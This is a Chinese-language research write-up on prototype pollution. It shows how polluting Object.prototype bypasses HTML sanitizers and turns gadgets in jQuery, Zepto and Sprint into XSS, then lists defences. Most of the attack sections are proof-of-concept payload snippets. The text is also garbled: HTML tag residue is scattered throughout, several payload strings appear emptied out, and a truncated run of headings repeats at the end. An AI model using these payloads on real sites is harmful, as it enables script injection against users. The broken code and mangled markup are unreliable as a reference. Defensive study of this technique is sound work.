原型链污染(Prototype Pollution)扩展利用与防御研究<\/h1>

前言<\/h2>
原型链污染(Prototype Pollution)是一种JavaScript特有的安全漏洞，攻击者通过修改对象的原型属性，影响所有继承自该原型的对象，从而可能导致跨站脚本(XSS)等安全问题。本文深入探讨原型链污染的扩展利用方式，特别是如何利用它绕过HTML过滤器，以及如何通过流行的JavaScript库实现XSS攻击。<\/p>

HTML过滤器绕过技术<\/h2>

过滤器工作原理<\/h3>

大多数HTML过滤器采用白名单机制，只允许特定的HTML标签和属性通过。过滤过程通常包括：<\/p>

初始化过滤选项（设置白名单、回调函数等）<\/li>
解析输入HTML<\/li>
对比标签和属性与白名单<\/li>

移除不在白名单中的内容<\/li> <\/ol>

原型链污染攻击点<\/h3>

当存在原型链污染漏洞时，可以污染以下关键属性：<\/p>

whiteList<\/code>：修改允许的标签和属性<\/li>
css<\/code>：禁用CSS过滤<\/li>

onTag<\/code>：修改标签处理逻辑<\/li>
<\/ul>
具体攻击方法<\/h3>
攻击filterXSS类过滤器<\/h4>
\/\/ 污染whiteList添加危险属性
<\/span><\/span><\/span><\/span>Object.prototype<\/span>.whiteList<\/span> =<\/span> Object.prototype<\/span>.whiteList<\/span> ||<\/span> {};
<\/span><\/span>Object.prototype<\/span>.whiteList<\/span>['img'<\/span>] =<\/span> ['src'<\/span>, 'onerror'<\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ 或者直接关闭CSS过滤
<\/span><\/span><\/span><\/span>Object.prototype<\/span>.css<\/span> =<\/span> false<\/span>;
<\/span><\/span><\/code><\/pre>攻击HtmlSanitizer<\/h4>
HtmlSanitizer使用以下白名单对象：<\/p>
var<\/span> tagWhitelist_<\/span> =<\/span> { 'A'<\/span>:<\/span> true<\/span>, 'IMG'<\/span>:<\/span> true<\/span>, ... };
<\/span><\/span>var<\/span> attributeWhitelist_<\/span> =<\/span> { 'src'<\/span>:<\/span> true<\/span>, 'href'<\/span>:<\/span> true<\/span>, ... };
<\/span><\/span>var<\/span> cssWhitelist_<\/span> =<\/span> { 'color'<\/span>:<\/span> true<\/span>, ... };
<\/span><\/span><\/code><\/pre>攻击方式：<\/p>
\/\/ 添加onerror属性到白名单
<\/span><\/span><\/span><\/span>Object.prototype<\/span>.attributeWhitelist_<\/span> =<\/span> Object.prototype<\/span>.attributeWhitelist_<\/span> ||<\/span> {};
<\/span><\/span>Object.prototype<\/span>.attributeWhitelist_<\/span>['onerror'<\/span>] =<\/span> true<\/span>;
<\/span><\/span><\/code><\/pre>防御措施<\/h3>
DOMPurify等现代过滤器已加入防御：<\/p>

冻结(Freeze)配置对象防止修改<\/li>
使用Object.create(null)<\/code>创建无原型的白名单对象<\/li>
检查关键配置属性是否被意外继承<\/li>
<\/ol>
从原型链污染到XSS的利用链<\/h2>
jQuery利用链<\/h3>
攻击流程<\/h4>

污染wrapMap<\/code>对象添加恶意包装标签<\/li>
当jQuery解析HTML时使用被污染的包装<\/li>
触发XSS<\/li>
<\/ol>
攻击代码<\/h4>
\/\/ 污染wrapMap
<\/span><\/span><\/span><\/span>Object.prototype<\/span>.wrapMap<\/span> =<\/span> Object.prototype<\/span>.wrapMap<\/span> ||<\/span> {};
<\/span><\/span>Object.prototype<\/span>.wrapMap<\/span>['malicious'<\/span>] =<\/span> [1<\/span>, ''<\/span>, ''<\/span>];
<\/span><\/span>
<\/span><\/span>\/\/ 触发解析
<\/span><\/span><\/span><\/span>$<\/span>("<malicious>test<\/malicious>"<\/span>).appendTo<\/span>("body"<\/span>);
<\/span><\/span><\/code><\/pre>关键代码分析<\/h4>
buildFragment<\/code>函数中的关键部分：<\/p>
tmp<\/span>.innerHTML<\/span> =<\/span> wrap<\/span>[1<\/span>] +<\/span> jQuery<\/span>.htmlPrefilter<\/span>(elem<\/span>) +<\/span> wrap<\/span>[2<\/span>];
<\/span><\/span><\/code><\/pre>通过污染wrapMap<\/code>控制wrap[1]<\/code>和wrap[2]<\/code>的内容，插入恶意HTML。<\/p>
Zepto利用链<\/h3>
攻击流程<\/h4>

污染对象添加事件处理器属性<\/li>
Zepto的fragment<\/code>函数处理属性时触发<\/li>
<\/ol>
攻击代码<\/h4>
Object.prototype<\/span>.onerror<\/span> =<\/span> "alert(1)"<\/span>;
<\/span><\/span>$<\/span>(""<\/span>, {}).appendTo<\/span>("body"<\/span>);
<\/span><\/span><\/code><\/pre>关键代码分析<\/h4>
zepto.fragment<\/code>函数中的属性处理：<\/p>
$<\/span>.each<\/span>(properties<\/span>, function<\/span>(key<\/span>, value<\/span>) {
<\/span><\/span>  if<\/span> (methodAttributes<\/span>.indexOf<\/span>(key<\/span>) ><\/span> -<\/span>1<\/span>) nodes<\/span>[key<\/span>](value<\/span>)
<\/span><\/span>  else<\/span> nodes<\/span>.attr<\/span>(key<\/span>, value<\/span>)
<\/span><\/span>})
<\/span><\/span><\/code><\/pre>会自动遍历原型链上的属性并设置。<\/p>
Sprint利用链<\/h3>
攻击流程<\/h4>
类似jQuery，通过污染wrapMap<\/code>实现攻击。<\/p>
攻击代码<\/h4>
Object.prototype<\/span>.wrapMap<\/span> =<\/span> {
<\/span><\/span>  malicious<\/span>:<\/span> {
<\/span><\/span>    intro<\/span>:<\/span> ''<\/span>,
<\/span><\/span>    outro<\/span>:<\/span> ''<\/span>
<\/span><\/span>  }
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>关键代码分析<\/h4>
createDOM<\/code>函数中的HTML拼接：<\/p>
tmp<\/span>.insertAdjacentHTML<\/span>("afterbegin"<\/span>, inMap<\/span>.intro<\/span> +<\/span> validHTML<\/span> +<\/span> inMap<\/span>.outro<\/span>);
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

使用Object.create(null)<\/code>创建无原型的配置对象<\/li>
冻结(Freeze)关键配置对象<\/li>
对用户输入进行严格验证<\/li>
使用现代HTML净化库并保持更新<\/li>
避免不安全的对象合并操作<\/li>
<\/ol>
参考资源<\/h2>

Client-Side Prototype Pollution<\/a><\/li>
Prototype Pollution and Bypassing Client-Side HTML Sanitizers<\/a><\/li>
DOMPurify防御措施<\/a><\/li>
<\/ol>
通过深入理解原型链污染的原理和利用方式，开发者可以更好地防御这类安全威胁，构建更安全的Web应用。<\/p>

原型链污染(Prototype Pollution)扩展利用与防御研究<\/h1>

HTML过滤器绕过技术<\/h2>

具体攻击方法<\/h3>

从原型链污染到XSS的利用链<\/h2>

jQuery利用链<\/h3>

Sprint利用链<\/h3>

攻击流程<\/h4> 类似jQuery，通过污染wrapMap<\/code>实现攻击。<\/p>

攻击流程<\/h4>
类似jQuery，通过污染`wrapMap<\/code>实现攻击。<\/p>`